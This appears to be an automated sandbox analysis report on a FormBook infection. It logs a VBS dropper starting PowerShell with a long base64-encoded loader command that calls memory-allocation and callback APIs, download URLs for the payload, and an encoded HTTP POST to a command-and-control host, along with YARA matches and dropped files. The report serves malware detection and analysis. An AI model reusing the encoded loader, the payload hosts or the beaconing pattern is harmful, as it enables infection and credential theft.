      Source: powershell.exe, 00000004.00000002.666875748.0000000005587000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: explorer.exe, 00000018.00000000.704735877.000000000095C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000000.687907955.000000000095C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000000.666953603.000000000095C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000000.756892182.000000000095C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
      Source: svchost.exe, 0000001A.00000002.874495731.0000000002E9D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpMicrosoftEdge_DNTExceptionLMEM8P
      Source: svchost.exe, 0000001A.00000002.874495731.0000000002E9D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/?ocid=iehp
      Source: svchost.exe, 0000001A.00000002.874495731.0000000002E9D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.msn.com/de-ch/ocid=iehpD
      Source: svchost.exe, 0000001A.00000002.874571626.0000000002EBE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.msn.com/ocid=iehp
      Source: svchost.exe, 0000001A.00000002.874595505.0000000002ED2000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.874020367.00000000027D8000.00000004.00000010.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.874571626.0000000002EBE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;g
      Source: svchost.exe, 0000001A.00000003.748120365.0000000005D00000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.874571626.0000000002EBE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=30055406629
      Source: svchost.exe, 0000001A.00000002.874571626.0000000002EBE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736
      Source: svchost.exe, 0000001A.00000002.874464586.0000000002E90000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gt
      Source: svchost.exe, 0000001A.00000002.874595505.0000000002ED2000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.874571626.0000000002EBE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=
      Source: svchost.exe, 0000001A.00000002.874571626.0000000002EBE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/checksync.php&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C
      Source: svchost.exe, 0000001A.00000002.874595505.0000000002ED2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
      Source: svchost.exe, 0000001A.00000002.874316141.0000000002E0E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/medianet.phpcid=8CU157172&crid=722878611&size=306x271&https=1
      Source: svchost.exe, 0000001A.00000002.874571626.0000000002EBE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/medianet.phpcid=8CU157172&crid=858412214&size=306x271&https=1
      Source: powershell.exe, 00000004.00000002.671138016.00000000064A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000004.00000002.671138016.00000000064A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000004.00000002.671138016.00000000064A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 00000004.00000002.666875748.0000000005587000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: ieinstal.exe, 00000017.00000002.729749422.0000000003110000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://madecosmetics.store/bin_FlDFmmV154.bin
      Source: powershell.exe, 00000004.00000002.671138016.00000000064A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: ieinstal.exe, 00000017.00000002.729749422.0000000003110000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bulkwhatsappsender.in/bin_FlDFmmV154.bin
      Source: ieinstal.exe, 00000017.00000002.729749422.0000000003110000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bulkwhatsappsender.in/bin_FlDFmmV154.binhttps://madecosmetics.store/bin_FlDFmmV154.bin
      Source: svchost.exe, 0000001A.00000002.875610610.0000000003E1F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dentalbatonrouge.com/k6sm/?d48pAVX=VId1XGgV51
      Source: svchost.exe, 0000001A.00000002.874571626.0000000002EBE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/
      Source: svchost.exe, 0000001A.00000003.748120365.0000000005D00000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/https://www.google.com/chrome/thank-you.htmlabout:blankhttps://adservi
      Source: svchost.exe, 0000001A.00000002.874464586.0000000002E90000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=0o
      Source: unknownDNS traffic detected: queries for: www.bulkwhatsappsender.in
      Source: global trafficHTTP traffic detected: GET /bin_FlDFmmV154.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.bulkwhatsappsender.inCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /k6sm/?d48pAVX=VId1XGgV51+banGxzL0dUPYEUmU95ttpJOMZNiN8gg3/S9FPXBDAGWpY0ehao+dqxo0M4PI93Q==&8pnDfl=Lb3tdB30pX2 HTTP/1.1Host: www.dentalbatonrouge.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
      Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
      Source: unknownHTTP traffic detected: POST /k6sm/ HTTP/1.1Host: www.dentalbatonrouge.comConnection: closeContent-Length: 417Cache-Control: no-cacheOrigin: http://www.dentalbatonrouge.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.dentalbatonrouge.com/k6sm/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 64 34 38 70 41 56 58 3d 64 71 52 50 4a 68 70 75 38 57 57 61 4c 41 58 66 67 76 45 42 4c 5a 74 69 62 45 49 77 30 4d 42 38 58 62 42 42 51 69 46 6c 68 53 54 6b 57 4d 68 48 64 55 79 71 4a 68 6f 45 71 75 46 6d 70 4f 4e 55 33 6f 45 50 31 2d 4d 61 75 43 4b 6e 57 6f 49 69 66 72 70 31 6c 59 47 4a 39 30 28 5f 61 62 70 6a 35 65 61 4b 44 43 30 59 30 43 28 37 6a 32 35 4f 4a 7a 49 49 68 76 65 61 57 38 4c 48 77 47 31 6f 58 57 51 76 62 35 61 51 49 4f 76 37 4c 6c 79 37 34 61 68 30 32 71 43 32 70 4b 72 67 4c 61 55 70 78 44 73 37 72 43 31 69 39 42 34 76 58 4e 49 43 58 63 64 70 49 64 4c 4b 4d 6f 62 52 64 32 31 6b 6d 6c 30 67 78 43 6f 31 4e 5a 45 76 44 54 36 46 6d 62 35 64 70 61 42 58 77 62 30 66 42 78 78 4b 6a 39 4d 30 43 71 44 6a 6f 56 68 47 4c 7a 4b 48 68 44 34 37 64 65 42 51 76 2d 4c 4c 45 37 49 57 73 54 6a 46 6b 6c 69 2d 52 47 43 38 56 45 70 57 54 46 67 46 72 76 4f 69 65 43 50 75 4e 62 77 61 34 66 61 71 57 4e 4e 6f 36 4d 74 6f 77 57 4f 73 66 30 52 4d 6c 43 6c 34 52 67 6f 76 41 2d 6d 6f 34 44 72 42 48 6f 7e 4d 4b 4a 61 37 41 44 50 68 68 32 4f 50 6a 72 31 50 70 44 67 38 55 70 4e 57 6a 4b 73 6f 35 41 38 51 62 70 48 49 28 46 6f 4c 37 37 7e 47 70 48 30 56 49 67 73 64 4f 5f 59 77 31 51 54 4c 65 5f 54 71 43 39 76 6a 63 7a 48 75 35 76 56 4b 65 52 45 2e 00 00 00 00 00 00 00 00 Data Ascii: d48pAVX=dqRPJhpu8WWaLAXfgvEBLZtibEIw0MB8XbBBQiFlhSTkWMhHdUyqJhoEquFmpONU3oEP1-MauCKnWoIifrp1lYGJ90(_abpj5eaKDC0Y0C(7j25OJzIIhveaW8LHwG1oXWQvb5aQIOv7Lly74ah02qC2pKrgLaUpxDs7rC1i9B4vXNICXcdpIdLKMobRd21kml0gxCo1NZEvDT6Fmb5dpaBXwb0fBxxKj9M0CqDjoVhGLzKHhD47deBQv-LLE7IWsTjFkli-RGC8VEpWTFgFrvOieCPuNbwa4faqWNNo6MtowWOsf0RMlCl4RgovA-mo4DrBHo~MKJa7ADPhh2OPjr1PpDg8UpNWjKso5A8QbpHI(FoL77~GpH0VIgsdO_Yw1QTLe_TqC9vjczHu5vVKeRE.
      Source: unknownHTTPS traffic detected: 151.106.117.33:443 -> 192.168.2.6:49820 version: TLS 1.2

      E-Banking Fraud

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 0000001A.00000002.874088041.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000002.873877212.0000000002710000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000018.00000000.698865578.000000000DD15000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000002.873684957.0000000000550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000002.729280321.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000002.729334535.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000018.00000000.716819564.000000000DD15000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

      System Summary

      barindex
      Detected FormBook malware
      Source: C:\Windows\SysWOW64\svchost.exeDropped file: C:\Users\user\AppData\Roaming\K-NBS4VB\K-Nlogri.iniJump to dropped file
      Source: C:\Windows\SysWOW64\svchost.exeDropped file: C:\Users\user\AppData\Roaming\K-NBS4VB\K-Nlogrv.iniJump to dropped file
      Malicious sample detected (through community Yara rule)
      Source: 0000001A.00000002.874088041.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000001A.00000002.874088041.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000001A.00000002.873877212.0000000002710000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000001A.00000002.873877212.0000000002710000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000018.00000000.698865578.000000000DD15000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000018.00000000.698865578.000000000DD15000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000001A.00000002.873684957.0000000000550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000001A.00000002.873684957.0000000000550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000017.00000002.729280321.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000017.00000002.729280321.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000017.00000002.729334535.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000017.00000002.729334535.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000018.00000000.716819564.000000000DD15000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000018.00000000.716819564.000000000DD15000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Wscript starts Powershell (via cmd or directly)
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBBAEkAUgBFAEQAIABTAGUAbgBnAGUAbABlAGoAIABWAGUAbgBkAGUAdABhADgAIABUAEUASQBTAFQARQAgAEYAbwBlAGwAZQBsAHMAZQBzAG0AOQAgAGEAbgB0AGkAdAB5AHIAbwAgAFQASQBMAFMAIABCAEwARwBGAFIAVQAgAEIAeQBkAGUAZgA1ACAATQBpAGwAaQA1ACAAQQBwAHAAbwBzACAAcwBvAGYAdABmAG8AbgB0AGUAdAAgAGEAbABrAG8AIABuAG8AbgBtAGEAcgBrAGUAdAAgAE0AbwBkAGkAcwAgAE0AbwBpAHMAIABVAG4AdgBlAGkAbABlAGQAIABVAG4AZQBtAGEAYwAgAGcAYQByAGIAbABlAHMAZgAgAHQAZQBlAG4AYQAgAFMASABVAFQAVABMAEUAIAANAAoADQAKAA0ACgBBAGQAZAAtAFQAeQBwAGUAIAAtAFQAeQBwAGUARABlAGYAaQBuAGkAdABpAG8AbgAgAEAAIgANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAE8AZgBhAHkAdgBlADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgAaQBuAHQAIABPAGYAYQB5AHYAZQA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABTAHcAYQB0ADkALABpAG4AdAAgAFIAYQBzAGsAbwA4ACwAcgBlAGYAIABJAG4AdAAzADIAIABPAGYAYQB5AHYAZQAsAGkAbgB0ACAATQBlAHQAegBlAHIAZQBzAHAAZQA5ACwAaQBuAHQAIABPAGYAYQB5AHYAZQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEIAVQBUAFQARQBSAE0AQQAsAHUAaQBuAHQAIABDAG8AbgB0AHIAYQA2ACwAaQBuAHQAIAB1AG4AZAB2AHIAcABpAGUAdABpACwAaQBuAHQAIABPAGYAYQB5AHYAZQAwACwAaQBuAHQAIABGAG8AbABkAHkAcwB5ADcALABpAG4AdAAgAE8AYgBvAGUAcgA4ACwAaQBuAHQAIABCAEwAVQBGAEYAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAAUgBhAHMAawBvADgAMAAsAHUAaQBuAHQAIABSAGEAcwBrAG8AOAAxACwASQBuAHQAUAB0AHIAIABSAGEAcwBrAG8AOAAyACwAcgBlAGYAIABJAG4AdAAzADIAIABSAGEAcwBrAG8AOAAzACwAaQBuAHQAIABSAGEAcwBrAG8AOAA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABSAGEAcwBrAG8AOAA1ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA2ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA3ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA4ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEgAdQB0AHUANwAgAGcAYQByAGEAbgAgAGQAeQBzAGMAaAAgAFUATgBVAE4ASQAgAFMAdABvAHIAIABPAFYARQBSAEkATgAgAGwAaQBmAHQAbQBhACAARQBsAGUAYwB0AHIAbwBkAGkAIABJAHIAcgBpAHQAZQByAGUAdAA0ACAAQgBvAG4AaQBuAGkAdABlADcAIABlAGMAZAB5AHMAbwBuAGEAbgAgAHMAaABhAHIAIABLAGEAcgBhAG4AdABuAGUAcwB0ACAAYgByAHUAdAB0AG8AIABhAG4AdAByAGEAYwBpACAARgB5AHIAbQBlACAATABhAHUAZAByAHUAcAB0AHIAaQA2ACAAZABlAHMAcABvAHQAaQB6ACAAVABlAG0AcABlAGwAawAgAFIAZQB0AHMAcwBpAGsAIABkAGUAbQBvAHUAZABnAGEAdgBlACAAVABBAEMAVABVACAATwBiAGoAdQAgAEwAVQBEAEkAQwBSAE8AVQBTAEMAIABzAHQAdQBtACAAV
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBBAEkAUgBFAEQAIABTAGUAbgBnAGUAbABlAGoAIABWAGUAbgBkAGUAdABhADgAIABUAEUASQBTAFQARQAgAEYAbwBlAGwAZQBsAHMAZQBzAG0AOQAgAGEAbgB0AGkAdAB5AHIAbwAgAFQASQBMAFMAIABCAEwARwBGAFIAVQAgAEIAeQBkAGUAZgA1ACAATQBpAGwAaQA1ACAAQQBwAHAAbwBzACAAcwBvAGYAdABmAG8AbgB0AGUAdAAgAGEAbABrAG8AIABuAG8AbgBtAGEAcgBrAGUAdAAgAE0AbwBkAGkAcwAgAE0AbwBpAHMAIABVAG4AdgBlAGkAbABlAGQAIABVAG4AZQBtAGEAYwAgAGcAYQByAGIAbABlAHMAZgAgAHQAZQBlAG4AYQAgAFMASABVAFQAVABMAEUAIAANAAoADQAKAA0ACgBBAGQAZAAtAFQAeQBwAGUAIAAtAFQAeQBwAGUARABlAGYAaQBuAGkAdABpAG8AbgAgAEAAIgANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAE8AZgBhAHkAdgBlADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgAaQBuAHQAIABPAGYAYQB5AHYAZQA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABTAHcAYQB0ADkALABpAG4AdAAgAFIAYQBzAGsAbwA4ACwAcgBlAGYAIABJAG4AdAAzADIAIABPAGYAYQB5AHYAZQAsAGkAbgB0ACAATQBlAHQAegBlAHIAZQBzAHAAZQA5ACwAaQBuAHQAIABPAGYAYQB5AHYAZQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEIAVQBUAFQARQBSAE0AQQAsAHUAaQBuAHQAIABDAG8AbgB0AHIAYQA2ACwAaQBuAHQAIAB1AG4AZAB2AHIAcABpAGUAdABpACwAaQBuAHQAIABPAGYAYQB5AHYAZQAwACwAaQBuAHQAIABGAG8AbABkAHkAcwB5ADcALABpAG4AdAAgAE8AYgBvAGUAcgA4ACwAaQBuAHQAIABCAEwAVQBGAEYAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAAUgBhAHMAawBvADgAMAAsAHUAaQBuAHQAIABSAGEAcwBrAG8AOAAxACwASQBuAHQAUAB0AHIAIABSAGEAcwBrAG8AOAAyACwAcgBlAGYAIABJAG4AdAAzADIAIABSAGEAcwBrAG8AOAAzACwAaQBuAHQAIABSAGEAcwBrAG8AOAA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABSAGEAcwBrAG8AOAA1ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA2ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA3ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA4ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEgAdQB0AHUANwAgAGcAYQByAGEAbgAgAGQAeQBzAGMAaAAgAFUATgBVAE4ASQAgAFMAdABvAHIAIABPAFYARQBSAEkATgAgAGwAaQBmAHQAbQBhACAARQBsAGUAYwB0AHIAbwBkAGkAIABJAHIAcgBpAHQAZQByAGUAdAA0ACAAQgBvAG4AaQBuAGkAdABlADcAIABlAGMAZAB5AHMAbwBuAGEAbgAgAHMAaABhAHIAIABLAGEAcgBhAG4AdABuAGUAcwB0ACAAYgByAHUAdAB0AG8AIABhAG4AdAByAGEAYwBpACAARgB5AHIAbQBlACAATABhAHUAZAByAHUAcAB0AHIAaQA2ACAAZABlAHMAcABvAHQAaQB6ACAAVABlAG0AcABlAGwAawAgAFIAZQB0AHMAcwBpAGsAIABkAGUAbQBvAHUAZABnAGEAdgBlACAAVABBAEMAVABVACAATwBiAGoAdQAgAEwAVQBEAEkAQwBSAE8AVQBTAEMAIABzAHQAdQBtACAAVJump to behavior
      Potential malicious VBS script found (suspicious strings)
      Source: Initial file: obj1.ShellExecute MyFile , RAVNEAGT ,"","",0
      Source: Initial file: obj1.ShellExecute "powershell.exe", RAVNEAGT ,"","",0
      Very long command line found
      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7837
      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7837Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_035A31214_2_035A3121
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_035A00404_2_035A0040
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_035ADA214_2_035ADA21
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_035A31214_2_035A3121
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_035A31214_2_035A3121
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_035AD9D84_2_035AD9D8
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_035AF0604_2_035AF060
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_035ADD7D4_2_035ADD7D
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_035B23CA4_2_035B23CA
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_035B37304_2_035B3730
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_035B4DA04_2_035B4DA0
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_035B33D84_2_035B33D8
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_035BD6984_2_035BD698
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_035BF4204_2_035BF420
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC76E3023_2_1EC76E30
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC8EBB023_2_1EC8EBB0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC6B09023_2_1EC6B090
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC820A023_2_1EC820A0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ED220A823_2_1ED220A8
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ED1100223_2_1ED11002
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC6841F23_2_1EC6841F
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC6D5E023_2_1EC6D5E0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC8258123_2_1EC82581
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ED21D5523_2_1ED21D55
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC5F90023_2_1EC5F900
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC50D2023_2_1EC50D20
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC7412023_2_1EC74120
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034F2B2826_2_034F2B28
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034EDBD226_2_034EDBD2
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0345EBB026_2_0345EBB0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034F22AE26_2_034F22AE
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0342F90026_2_0342F900
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0344412026_2_03444120
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034E100226_2_034E1002
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034F28EC26_2_034F28EC
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0343B09026_2_0343B090
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034520A026_2_034520A0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034F20A826_2_034F20A8
